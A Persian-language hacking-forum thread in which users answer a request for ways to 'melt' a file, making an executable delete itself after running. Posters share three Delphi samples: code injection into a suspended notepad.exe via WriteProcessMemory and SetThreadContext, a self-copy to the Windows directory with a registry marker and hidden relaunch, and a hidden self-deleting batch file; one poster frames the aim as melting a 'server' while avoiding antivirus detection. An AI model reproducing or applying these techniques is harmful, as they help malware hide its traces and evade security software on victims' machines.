ايران ويج

مي شه روش هاي melt فايل رو بعد از اجرا بگين ؟ لطفا.مرسي

این یک روش melt با استفاده از injection می باشد

کد: 
program Inj;

uses

  Windows;

var

  sBuff:    array[0..255] of Char;

{$R *.res}

procedure MeltProc();

begin

  Sleep(500);

  DeleteFile(sBuff);

end;

function InjectCode(szProcessName:string; pFunction:Pointer):Boolean;

var

  STARTINFO:  TStartupInfo;

  PROCINFO:   TProcessInformation;

  pFunc:      Pointer;

  dSize:      DWORD;

  pInjected:  Pointer;

  dWritten:   DWORD;

  CONTEXT:    TContext;

  hMod:       THandle;

  IDH:        TImageDosHeader;

  INH:        TImageNtHeaders;

begin

  FillChar(STARTINFO, SizeOf(TStartupInfo), #0);

  STARTINFO.cb := SizeOf(TStartupInfo);

  if CreateProcess(nil, PChar(szProcessName),  nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, STARTINFO, PROCINFO) then

  begin

    hMod := GetModuleHandle(nil);

    CopyMemory(@IDH, Pointer(hMod), 64);

    if IDH.e_magic = IMAGE_DOS_SIGNATURE then

    begin

      CopyMemory(@INH, Pointer(hMod + IDH._lfanew), 248);

      if INH.Signature = IMAGE_NT_SIGNATURE then

      begin

        dSize := INH.OptionalHeader.SizeOfImage;

        pInjected := VirtualAllocEx(PROCINFO.hProcess, Ptr(hMod), dSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        WriteProcessMemory(PROCINFO.hProcess, pInjected, Ptr(hMod), dSize, dWritten);

        CONTEXT.ContextFlags := CONTEXT_FULL;

        GetThreadContext(PROCINFO.hThread, CONTEXT);

        CONTEXT.Eip := DWORD(pFunction);

        SetThreadContext(PROCINFO.hThread, CONTEXT);

        ResumeThread(PROCINFO.hThread);

      end;                 

    end;

  end;

end;

procedure MeltFile();

begin

  GetModuleFileName(0, sBuff, 256);

  InjectCode('notepad.exe', @MeltProc);

end;

begin

  MeltFile;

end.

ملت سرور از طریق اینجکشن خیلی روش قشنگیه ولی آنتی خیلی به این چیزا گیر میده قبلا تست کردم واسه همین بهتره از روشی که غیرقابل شناسایی تره استفاده بشه.
ممنون مبین جان.

کد: 
program melt;

uses

 windows;

 var

theoldfile,ournewfile:string;

function ShellExecuteA(hWnd: LongWord; Operation, FileName, Parameters, Directory: PAnsiChar; ShowCmd: Integer): HINST; stdcall; external 'shell32.dll';

function WriteToReg(key:Hkey; subkey,name,value:string):boolean;

var

regkey:hkey;

begin

result := false;

RegCreateKey(key,PChar(subkey),regkey);

if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then

result := true;

RegCloseKey(regkey);

end;

Function ReadFromReg(Key:HKEY;Path:string;Value,Default:string):string;

 Var

  Handle:HKEY;

  RegType:integer;

  DataSize:integer;

 begin

  Result:=Default;

  if (RegOpenKeyEx(Key,pchar(Path),0,KEY_ALL_ACCESS,Handle)=ERROR_SUCCESS) then begin

   if RegQueryValueEx(Handle,pchar(Value),nil,@RegType,nil,@DataSize)=ERROR_SUCCESS then begin

    SetLength(Result,Datasize);

    RegQueryValueEx(Handle,pchar(Value),nil,@RegType,PByte(pchar(Result)),@DataSize);

    SetLength(Result,Datasize-1);

   end;

   RegCloseKey(Handle);

  end;

 end;

 function getwindir():string;

 var

 windir:array [0..1024] of char;

 begin

  getwindowsdirectory(windir,56);

  result:=string(windir)+'\';

 end;

begin

theoldfile:=readfromreg(HKEY_current_user,'Software\Microsoft\Windows\CurrentVersion\settings','LocationOld','DIDNT FIND ANYTHING') ;

ournewfile:=getwindir+'copyofMelt.exe';

 if paramstr(0) <> ournewfile  then begin

 deletefile(pchar(theoldfile));

 writetoreg(HKEY_current_user,'Software\Microsoft\Windows\CurrentVersion\settings','LocationOld',paramstr(0));

Copyfile(pchar(paramstr(0)),pchar(ournewfile),false);

shellexecuteA(0,nil,pchar(OurNewFile),nil,nil,0);

halt(0)

end

else begin

deletefile(pchar(theoldfile));

end;

while true do sleep(1000);

end.

این هم یک روش دیگه

کد: 
procedure DeleteEXE;

  function GetTmpDir: string;

  var

    pc: PChar;

  begin

    pc := StrAlloc(MAX_PATH + 1);

    GetTempPath(MAX_PATH, pc);

    Result := string(pc);

    StrDispose(pc);

  end;

  function GetTmpFileName(ext: string): string;

  var

    pc: PChar;

  begin

    pc := StrAlloc(MAX_PATH + 1);

    GetTempFileName(PChar(GetTmpDir), 'uis', 0, pc);

    Result := string(pc);

    Result := ChangeFileExt(Result, ext);

    StrDispose(pc);

  end;

var

  batchfile: TStringList;

  batchname: string;

begin

  batchname := GetTmpFileName('.bat');

  FileSetAttr(ParamStr(0), 0);

  batchfile := TStringList.Create;

  with batchfile do

  begin

    try

      Add(':Label1');

      Add('del "' + ParamStr(0) + '"');

      Add('if Exist "' + ParamStr(0) + '" goto Label1');

      Add('rmdir "' + ExtractFilePath(ParamStr(0)) + '"');

      Add('del ' + batchname);

      SaveToFile(batchname);

      ChDir(GetTmpDir);

      ShowMessage('Uninstalling program...');

      WinExec(PChar(batchname), SW_HIDE);

    finally

      batchfile.Free;

    end;

    Halt;

  end;

end;

FarhadShafaq

lord_viper

veyskarami

lord_viper